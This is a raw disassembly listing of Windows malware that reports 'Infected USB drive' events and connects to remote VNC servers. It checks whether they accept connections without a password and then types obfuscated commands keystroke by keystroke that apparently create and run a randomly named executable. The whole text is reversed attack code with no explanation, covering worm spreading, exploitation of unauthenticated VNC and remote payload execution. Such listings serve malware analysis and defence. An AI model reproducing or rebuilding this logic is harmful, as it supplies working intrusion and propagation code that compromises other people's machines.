mov ebx, offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
mov edi, offset aSInfectedUsbDr ; "%s Infected USB drive: %s"
mov esi, offset dword_443EFC
loc_407E9D: ; CODE XREF: sub_407E1C+FE�j
mov al, [ecx]
cmp al, 41h
mov byte ptr [ebp+arg_0], al
jz short loc_407F0E
cmp al, 42h
jz short loc_407F0E
cmp al, 61h
jz short loc_407F0E
cmp al, 62h
jz short loc_407F0E
lea eax, [ebp+arg_0]
push eax
call dword_437094 ; GetDriveTypeA
cmp eax, 2
jnz short loc_407F0B
lea eax, [ebp+arg_0]
push eax
call sub_40797B
test eax, eax
pop ecx
jz short loc_407F0B
cmp [ebp+var_18], 0
jz short loc_407EF0
cmp [ebp+var_10], 0
jnz short loc_407EF6
lea eax, [ebp+arg_0]
push eax
push ebx
push edi
push esi
push [ebp+var_C8]
call sub_41CD84
add esp, 14h
loc_407EF0: ; CODE XREF: sub_407E1C+B7�j
cmp [ebp+var_10], 0
jz short loc_407F0B
loc_407EF6: ; CODE XREF: sub_407E1C+BD�j
lea eax, [ebp+arg_0]
push eax
push ebx
push edi
push esi
push [ebp+var_C8]
call sub_41CD0E
add esp, 14h
loc_407F0B: ; CODE XREF: sub_407E1C+A3�j
; sub_407E1C+B1�j ...
mov ecx, [ebp+var_4]
loc_407F0E: ; CODE XREF: sub_407E1C+88�j
; sub_407E1C+8C�j ...
mov al, [ecx]
inc ecx
test al, al
jnz short loc_407F0E
cmp [ecx], al
mov [ebp+var_4], ecx
jnz short loc_407E9D
pop ebx
loc_407F1D: ; CODE XREF: sub_407E1C+62�j
xor eax, eax
pop edi
inc eax
pop esi
leave
retn 4
sub_407E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F26 proc near ; CODE XREF: sub_408B6A+604�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
lea eax, [ebp+var_8]
xor esi, esi
sub edi, eax
loc_407F37: ; CODE XREF: sub_407F26+32�j
push [ebp+arg_4]
call sub_4292D0
cmp esi, eax
pop ecx
jnb short loc_407F4F
lea eax, [ebp+esi+var_8]
mov cl, [edi+eax]
mov [eax], cl
jmp short loc_407F54
; ---------------------------------------------------------------------------
loc_407F4F: ; CODE XREF: sub_407F26+1C�j
and [ebp+esi+var_8], 0
loc_407F54: ; CODE XREF: sub_407F26+27�j
inc esi
cmp esi, 8
jb short loc_407F37
lea eax, [ebp+var_8]
push 0
push eax
call sub_403476
mov esi, [ebp+arg_0]
pop ecx
pop ecx
push 2
pop edi
loc_407F6D: ; CODE XREF: sub_407F26+54�j
push esi
push esi
call sub_40363C
pop ecx
add esi, 8
dec edi
pop ecx
jnz short loc_407F6D
pop edi
pop esi
leave
retn
sub_407F26 endp
; =============== S U B R O U T I N E =======================================
sub_407F80 proc near ; CODE XREF: .text:00408369�p
; .text:004083EB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
jmp short loc_407FAB
; ---------------------------------------------------------------------------
loc_407F8A: ; CODE XREF: sub_407F80+2D�j
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_456F38 ; recv
test eax, eax
jz short loc_407FB5
cmp eax, 0FFFFFFFFh
jz short loc_407FB5
sub edi, eax
add esi, eax
loc_407FAB: ; CODE XREF: sub_407F80+8�j
test edi, edi
jg short loc_407F8A
xor eax, eax
inc eax
loc_407FB2: ; CODE XREF: sub_407F80+37�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_407FB5: ; CODE XREF: sub_407F80+20�j
; sub_407F80+25�j
xor eax, eax
jmp short loc_407FB2
sub_407F80 endp
; =============== S U B R O U T I N E =======================================
sub_407FB9 proc near ; CODE XREF: .text:004083D0�p
; .text:00408441�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_407FF6
xor esi, esi
test edi, edi
jle short loc_407FF0
loc_407FC9: ; CODE XREF: sub_407FB9+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_407FF6
test eax, eax
jz short loc_407FF6
add esi, eax
cmp esi, edi
jl short loc_407FC9
loc_407FF0: ; CODE XREF: sub_407FB9+E�j
xor eax, eax
inc eax
loc_407FF3: ; CODE XREF: sub_407FB9+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_407FF6: ; CODE XREF: sub_407FB9+8�j
; sub_407FB9+2B�j ...
xor eax, eax
jmp short loc_407FF3
sub_407FB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FFA proc near ; CODE XREF: .text:0040858F�p
; .text:004085A5�p ...
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
mov esi, offset dword_455384
lea edi, [ebp+var_10]
mov ax, word_43EE74
movsd
movsb
mov esi, offset dword_4557A8
lea edi, [ebp+var_18]
mov [ebp+var_2], ax
mov ax, word_43EE70
movsd
mov [ebp+var_6], ax
mov ax, word_454018
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_4080C3
mov edi, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+arg_8], esi
loc_40804C: ; CODE XREF: sub_407FFA+C4�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_408069
dec eax
jnz short loc_4080B7
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F6C ; send
lea eax, [ebp+var_4]
jmp short loc_40807A
; ---------------------------------------------------------------------------
loc_408069: ; CODE XREF: sub_407FFA+57�j
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F6C ; send
lea eax, [ebp+var_6]
loc_40807A: ; CODE XREF: sub_407FFA+6D�j
push esi
push 1
push eax
push edi
call dword_456F6C ; send
push ebx
call sub_4292D0
pop ecx
cmp eax, 2
push esi
jnz short loc_408099
push 4
lea eax, [ebp+var_10]
jmp short loc_40809E
; ---------------------------------------------------------------------------
loc_408099: ; CODE XREF: sub_407FFA+96�j
push 5
lea eax, [ebp+var_18]
loc_40809E: ; CODE XREF: sub_407FFA+9D�j
push eax
push edi
call dword_456F6C ; send
push esi
push ebx
call sub_4292D0
pop ecx
push eax
push ebx
push edi
call dword_456F6C ; send
loc_4080B7: ; CODE XREF: sub_407FFA+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_40804C
pop ebx
jmp short loc_408136
; ---------------------------------------------------------------------------
loc_4080C3: ; CODE XREF: sub_407FFA+42�j
dec eax
jz short loc_4080DF
dec eax
jnz short loc_408136
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F6C ; send
lea eax, [ebp+var_4]
jmp short loc_4080F3
; ---------------------------------------------------------------------------
loc_4080DF: ; CODE XREF: sub_407FFA+CA�j
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F6C ; send
lea eax, [ebp+var_6]
loc_4080F3: ; CODE XREF: sub_407FFA+E3�j
push esi
push 1
push eax
push edi
call dword_456F6C ; send
push [ebp+arg_4]
call sub_4292D0
pop ecx
cmp eax, 2
push esi
jnz short loc_408114
push 4
lea eax, [ebp+var_10]
jmp short loc_408119
; ---------------------------------------------------------------------------
loc_408114: ; CODE XREF: sub_407FFA+111�j
push 5
lea eax, [ebp+var_18]
loc_408119: ; CODE XREF: sub_407FFA+118�j
push eax
push edi
call dword_456F6C ; send
push esi
push [ebp+arg_4]
call sub_4292D0
pop ecx
push eax
push [ebp+arg_4]
push edi
call dword_456F6C ; send
loc_408136: ; CODE XREF: sub_407FFA+C7�j
; sub_407FFA+CD�j
pop edi
pop esi
leave
retn
sub_407FFA endp
; ---------------------------------------------------------------------------
mov eax, 29ECh
call sub_429A90
push ebx
push ebp
push esi
push edi
mov esi, offset dword_43EF88
lea edi, [esp+7Ch]
movsd
movsd
movsd
movsb
mov esi, offset dword_43EF84
lea edi, [esp+60h]
movsw
movsb
mov esi, offset dword_455384
lea edi, [esp+64h]
movsd
movsb
mov esi, offset dword_43EF80
lea edi, [esp+20h]
movsw
movsb
mov esi, offset dword_43EF7C
lea edi, [esp+38h]
movsw
mov ax, word_43EE70
movsb
mov esi, offset loc_43EF78
lea edi, [esp+1Ch]
movsw
movsb
mov [esp+2Ah], ax
mov [esp+3Eh], ax
mov ax, word_43EF74
xor esi, esi
mov [esp+26h], ax
mov ax, word_43EF70
push esi
push 1
push 2
mov [esp+34h], ax
mov [esp+3Ch], esi
call dword_456FB0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [esp+14h], edi
jnz short loc_4081D9
push eax
call dword_456FD0 ; closesocket
loc_4081D9: ; CODE XREF: .text:004081D0�j
lea eax, [esp+2A08h]
mov word ptr [esp+9Ch], 2
push eax
call dword_456F5C ; inet_addr
push 170Ch
mov [esp+0A4h], eax
call dword_456F18 ; ntohs
mov [esp+9Eh], ax
lea eax, [esp+9Ch]
push 10h
push eax
push edi
call dword_456E9C ; connect
test eax, eax
jnz loc_408B53
mov edi, dword_43718C
mov ebp, 3E8h
mov ebx, offset byte_4556A8
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
loc_408239: ; CODE XREF: .text:004082E9�j
; .text:00408430�j ...
push 40h
lea eax, [esp+0B0h]
push 0
push eax
call sub_429690
add esp, 0Ch
lea eax, [esp+0ACh]
push 0
push 40h
push eax
push dword ptr [esp+20h]
call dword_456F38 ; recv
test eax, eax
jle loc_408895
cmp eax, 0FFFFFFFFh
jz loc_408895
mov eax, [esp+30h]
sub eax, 0
jz loc_408845
dec eax
jz short loc_4082AD
dec eax
jnz loc_40888A
lea eax, [esp+64h]
push eax
lea eax, [esp+0B0h]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz loc_408895
loc_4082A6: ; CODE XREF: .text:0040885A�j
xor esi, esi
jmp loc_408B53
; ---------------------------------------------------------------------------
loc_4082AD: ; CODE XREF: .text:00408282�j
lea eax, [esp+60h]
push eax
lea eax, [esp+0B0h]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
push 0
jnz short loc_4082EE
lea eax, [esp+2Eh]
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [esp+32h]
push eax
push dword ptr [esp+20h]
call dword_456F6C ; send
mov dword ptr [esp+30h], 2
jmp loc_408239
; ---------------------------------------------------------------------------
loc_4082EE: ; CODE XREF: .text:004082C4�j
push 1
push 2
call dword_456FB0 ; socket
cmp eax, 0FFFFFFFFh
jz loc_408A06
lea eax, [esp+2A08h]
push eax
call dword_456F5C ; inet_addr
push dword ptr [esp+2AACh]
mov [esp+94h], eax
mov word ptr [esp+90h], 2
call dword_456F18 ; ntohs
push 6
push 1
push 2
mov [esp+9Ah], ax
call dword_4372B8 ; socket
lea ecx, [esp+8Ch]
push 10h
push ecx
push eax
mov [esp+1Ch], eax
call dword_456E9C ; connect
test eax, eax
jnz loc_408A06
lea eax, [esp+6Ch]
push 0Ch
push eax
push dword ptr [esp+18h]
call sub_407F80
add esp, 0Ch
test eax, eax
jz loc_4089FC
lea eax, [esp+2Ch]
and byte ptr [esp+78h], 0
push eax
lea eax, [esp+38h]
push eax
lea eax, [esp+74h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_429D3E
add esp, 10h
push 3
pop eax
cmp [esp+34h], eax
jl loc_4089FC
jnz short loc_4083B3
cmp [esp+2Ch], eax
jl loc_4089FC
loc_4083B3: ; CODE XREF: .text:004083A7�j
push 5
push eax
lea eax, [esp+74h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_429A33
lea eax, [esp+7Ch]
push 0Ch
push eax
push dword ptr [esp+28h]
call sub_407FB9
add esp, 1Ch
test eax, eax
jz loc_4089FC
lea eax, [esp+44h]
push 4
push eax
push dword ptr [esp+18h]
call sub_407F80
add esp, 0Ch
test eax, eax
jz loc_4089FC
mov ecx, [esp+44h]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [esp+44h], eax
sub eax, 0
jz loc_408A06
dec eax
jnz loc_408239
push 1
push offset word_454018
push dword ptr [esp+18h]
call sub_407FB9
add esp, 0Ch
test eax, eax
jz loc_408239
lea eax, [esp+48h]
push 18h
push eax
push dword ptr [esp+18h]
call sub_407F80
add esp, 0Ch
test eax, eax
jz loc_408239
mov eax, [esp+48h]
xor edx, edx
mov dl, [esp+49h]
mov ecx, 0FFh
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+4Ah]
mov [esp+48h], dx
xor edx, edx
mov dl, [esp+4Bh]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+50h]
mov [esp+4Ah], dx
xor edx, edx
mov dl, [esp+51h]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+52h]
mov [esp+50h], dx
xor edx, edx
mov dl, [esp+53h]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+54h]
mov [esp+52h], dx
xor edx, edx
mov dl, [esp+55h]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+5Ch]
mov [esp+54h], dx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [esp+2A08h]
push eax
lea eax, [esp+2F0h]
push dword ptr [esp+30h]
shr ecx, 8
push dword ptr [esp+3Ch]
shl edx, 8
push offset aVncD_DSNopass ; "VNC%d.%d: %s - (NoPass)"
or ecx, edx
push 2710h
push eax
mov [esp+74h], ecx
call sub_429AEE
add esp, 18h
cmp dword ptr [esp+2AC4h], 0
jz short loc_408570
lea eax, [esp+2ECh]
push eax
push offset aS_5 ; "%s"
push dword ptr [esp+2A08h]
push dword ptr [esp+2A10h]
call sub_41CD84
add esp, 10h
loc_408570: ; CODE XREF: .text:0040854B�j
push 2710h
lea eax, [esp+2F0h]
push 0
push eax
call sub_429690
lea eax, [esp+2Ch]
push 1
push eax
push dword ptr [esp+24h]
call sub_407FFA
add esp, 18h
push ebp
call edi ; dword_43718C
lea eax, [esp+28h]
push 0
push eax
push dword ptr [esp+18h]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+20h]
push 2
push eax
push dword ptr [esp+18h]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+1FCh]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429A33
push 100h
push 0
push ebx
call sub_429690
add esp, 2Ch
cmp dword_456D88, 0
jnz loc_4086E4
lea eax, [esp+2A08h]
push eax
call sub_41E3FB
test eax, eax
pop ecx
mov dword ptr [esp+18h], offset dword_457CD8
jnz short loc_408658
mov dword ptr [esp+18h], offset dword_457C20
loc_408658: ; CODE XREF: .text:0040864E�j
lea eax, [esp+1ECh]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+210h]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A10
push dword ptr [esp+64h]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 68h
jmp loc_408770
; ---------------------------------------------------------------------------
loc_4086E4: ; CODE XREF: .text:00408630�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456B88
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456B88
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_456988
push offset dword_456788
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_456780
push offset dword_456580
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 74h
loc_408770: ; CODE XREF: .text:004086DF�j
and dword ptr [esp+18h], 0
push ebx
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_4087C5
loc_408780: ; CODE XREF: .text:004087C3�j
mov eax, [esp+18h]
movsx eax, byte_4556A8[eax]
push eax
push offset dword_43EE88
lea eax, [esp+48h]
push 3
push eax
call sub_429AEE
lea eax, [esp+50h]
push 0
push eax
push dword ptr [esp+28h]
call sub_407FFA
add esp, 1Ch
push 0Fh
call edi ; dword_43718C
inc dword ptr [esp+18h]
push ebx
call sub_4292D0
cmp [esp+1Ch], eax
pop ecx
jb short loc_408780
loc_4087C5: ; CODE XREF: .text:0040877E�j
push ebp
call edi ; dword_43718C
lea eax, [esp+38h]
push 0
push eax
push dword ptr [esp+18h]
call sub_407FFA
add esp, 0Ch
push 7530h
call edi ; dword_43718C
lea eax, [esp+1Ch]
push 1
push eax
push dword ptr [esp+18h]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+26h]
push 0
push eax
push dword ptr [esp+18h]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+1Ch]
push 2
push eax
push dword ptr [esp+18h]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
mov eax, [esp+2AB4h]
mov dword_4556A0, 1
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
jmp loc_408239
; ---------------------------------------------------------------------------
loc_408845: ; CODE XREF: .text:0040827B�j
lea eax, [esp+7Ch]
push eax
lea eax, [esp+0B0h]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz loc_4082A6
push eax
lea eax, [esp+80h]
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [esp+84h]
push eax
push dword ptr [esp+20h]
call dword_456F6C ; send
mov dword ptr [esp+30h], 1
loc_40888A: ; CODE XREF: .text:00408285�j
cmp dword ptr [esp+30h], 3
jnz loc_408239
loc_408895: ; CODE XREF: .text:00408265�j
; .text:0040826E�j ...
push 0
lea eax, [esp+42h]
push 1
push eax
push dword ptr [esp+20h]
call dword_456F6C ; send
lea eax, [esp+20h]
push 1
push eax
push dword ptr [esp+1Ch]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+28h]
push 0
push eax
push dword ptr [esp+1Ch]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+20h]
push 2
push eax
push dword ptr [esp+1Ch]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+0F8h]
push edx
push offset dword_44399C
push offset dword_43EE78
push eax
call sub_429A33
push 100h
push 0
push ebx
call sub_429690
add esp, 28h
cmp dword_456D88, 0
jnz loc_408A0D
lea eax, [esp+2A08h]
push eax
call sub_41E3FB
test eax, eax
pop ecx
mov dword ptr [esp+2Ch], offset dword_457CD8
jnz short loc_408970
mov dword ptr [esp+2Ch], offset dword_457C20
loc_408970: ; CODE XREF: .text:00408966�j
lea eax, [esp+0ECh]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+110h]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A10
push dword ptr [esp+78h]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 68h
jmp loc_408A99
; ---------------------------------------------------------------------------
loc_4089FC: ; CODE XREF: .text:00408373�j
; .text:004083A1�j ...
push dword ptr [esp+10h]
call dword_4372D4 ; closesocket
loc_408A06: ; CODE XREF: .text:004082FB�j
; .text:00408358�j ...
xor eax, eax
jmp loc_408B5F
; ---------------------------------------------------------------------------
loc_408A0D: ; CODE XREF: .text:00408948�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456B88
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456B88
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_456988
push offset dword_456788
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_456780
push offset dword_456580
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 74h
loc_408A99: ; CODE XREF: .text:004089F7�j
push ebx
xor esi, esi
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_408AE2
loc_408AA6: ; CODE XREF: .text:00408AE0�j
movsx eax, byte_4556A8[esi]
push eax
push offset dword_43EE88
lea eax, [esp+48h]
push 3
push eax
call sub_429AEE
lea eax, [esp+50h]
push 0
push eax
push dword ptr [esp+2Ch]
call sub_407FFA
add esp, 1Ch
push 0Ah
call edi ; dword_43718C
push ebx
inc esi
call sub_4292D0
cmp esi, eax
pop ecx
jb short loc_408AA6
loc_408AE2: ; CODE XREF: .text:00408AA4�j
push ebp
call edi ; dword_43718C
mov ebx, [esp+14h]
lea eax, [esp+38h]
push 0
push eax
push ebx
call sub_407FFA
add esp, 0Ch
push 7530h
call edi ; dword_43718C
xor esi, esi
lea eax, [esp+1Ch]
inc esi
push esi
push eax
push ebx
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+26h]
push 0
push eax
push ebx
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+1Ch]
push 2
push eax
push ebx
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
mov eax, [esp+2AB4h]
mov dword_4556A0, esi
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
loc_408B53: ; CODE XREF: .text:0040821E�j
; .text:004082A8�j
push dword ptr [esp+14h]
call dword_456FD0 ; closesocket
mov eax, esi
loc_408B5F: ; CODE XREF: .text:00408A08�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 29ECh
retn
; =============== S U B R O U T I N E =======================================
sub_408B6A proc near ; CODE XREF: .text:00409651�p
var_74 = byte ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
arg_4 = byte ptr 8
arg_8 = byte ptr 0Ch
arg_C = word ptr 10h
arg_E = word ptr 12h
arg_10 = dword ptr 14h
arg_18 = dword ptr 1Ch
arg_1C = dword ptr 20h
arg_20 = byte ptr 24h
arg_24 = dword ptr 28h
arg_28 = dword ptr 2Ch
arg_2C = byte ptr 30h
arg_38 = byte ptr 3Ch
arg_48 = byte ptr 4Ch
arg_50 = byte ptr 54h
arg_56 = word ptr 5Ah
arg_58 = word ptr 5Ch
arg_5C = dword ptr 60h
arg_12C = byte ptr 130h
arg_15C = byte ptr 160h
arg_283C = byte ptr 2840h
arg_2840 = dword ptr 2844h
arg_2844 = dword ptr 2848h
arg_2848 = byte ptr 284Ch
arg_286C = byte ptr 2870h
arg_2870 = dword ptr 2874h
arg_2874 = dword ptr 2878h
arg_2878 = byte ptr 287Ch
arg_2898 = byte ptr 289Ch
arg_28D0 = dword ptr 28D4h
arg_2900 = dword ptr 2904h
arg_2904 = dword ptr 2908h
arg_290C = dword ptr 2910h
arg_2914 = dword ptr 2918h
arg_2934 = dword ptr 2938h
arg_2938 = dword ptr 293Ch
mov eax, 289Ch
call sub_429A90
push ebx
push ebp
push esi
push edi
mov esi, offset dword_43EF80
lea edi, [esp+10h+arg_8]
movsw
movsb
mov esi, offset dword_43EF7C
lea edi, [esp+10h+arg_1C]
movsw
mov ax, word_43EF70
xor ebx, ebx
movsb
mov esi, offset loc_43EF78
lea edi, [esp+10h+arg_4]
movsw
mov [esp+10h+arg_E], ax
mov ax, word_43EF74
push ebx
push 1
push 2
mov dword_4556A0, ebx
movsb
mov [esp+1Ch+arg_C], ax
call dword_456FB0 ; socket
cmp eax, 0FFFFFFFFh
jz loc_4091F9
lea eax, [esp+1Ch+arg_2898]
push eax
call dword_456F5C ; inet_addr
push [esp+20h+arg_2938]
mov [esp+24h+arg_5C], eax
mov [esp+24h+arg_58], 2
call dword_456F18 ; ntohs
push 6
push 1
push 2
mov [esp+30h+arg_56], ax
call dword_4372B8 ; socket
mov edi, eax
lea eax, [esp+30h+arg_48]
push 10h
push eax
push edi
mov [esp+3Ch+var_20], edi
call dword_456E9C ; connect
test eax, eax
jnz loc_4091F9
lea eax, [esp+3Ch+arg_2C]
push 0Ch
push eax
push edi
call sub_407F80
add esp, 0Ch
test eax, eax
jnz short loc_408C45
loc_408C3E: ; CODE XREF: sub_408B6A+104�j
; sub_408B6A+10C�j ...
xor esi, esi
jmp loc_408D03
; ---------------------------------------------------------------------------
loc_408C45: ; CODE XREF: sub_408B6A+D2�j
lea eax, [esp+3Ch+var_10]
and [esp+3Ch+arg_38], 0
push eax
lea eax, [esp+40h+var_18]
push eax
mov esi, offset aRfb03d_03d ; "RFB %03d.%03d\n"
lea eax, [esp+44h+arg_2C]
push esi
push eax
call sub_429D3E
add esp, 10h
push 3
pop eax
cmp [esp+3Ch+var_18], eax
jl short loc_408C3E
jnz short loc_408C78
cmp [esp+3Ch+var_10], eax
jl short loc_408C3E
loc_408C78: ; CODE XREF: sub_408B6A+106�j
push 5
push eax
lea eax, [esp+44h+arg_2C]
push esi
push eax
call sub_429A33
lea eax, [esp+4Ch+arg_2C]
push 0Ch
push eax
